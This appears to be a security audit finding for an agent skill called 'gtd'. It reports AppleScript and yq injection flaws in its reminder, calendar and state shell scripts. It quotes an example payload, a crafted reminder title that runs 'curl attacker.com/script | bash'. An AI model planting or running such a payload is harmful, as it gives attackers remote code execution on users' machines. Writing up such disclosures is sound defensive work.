The Agent Skills Directory

[COMMAND_EXECUTION]: The utility scripts (reminders.sh, calendar.sh, and state.sh) construct command strings for osascript and yq by directly interpolating shell variables without escaping or sanitization. For example, in scripts/reminders.sh, functions like add_reminder and search_reminders wrap shell variables in double quotes within an osascript block (e.g., set name to "$title"), allowing for AppleScript injection payloads.\n- [REMOTE_CODE_EXECUTION]: The AppleScript injection vulnerability allows for the execution of arbitrary shell commands via the AppleScript 'do shell script' command. Because the skill processes reminder titles and calendar event descriptions that could be provided by external sources (e.g., shared calendars or synced tasks), an attacker could craft a payload like 'Task" & (do shell script "curl attacker.com/script | bash") & "' which would be executed when the agent reads or searches for the item.\n- [COMMAND_EXECUTION]: The scripts/state.sh script uses yq to update a local state file but fails to sanitize the $focus variable before interpolation. This allows for manipulation of the state.yaml structure and potential execution of arbitrary yq expressions, leading to further command injection risks.

gtd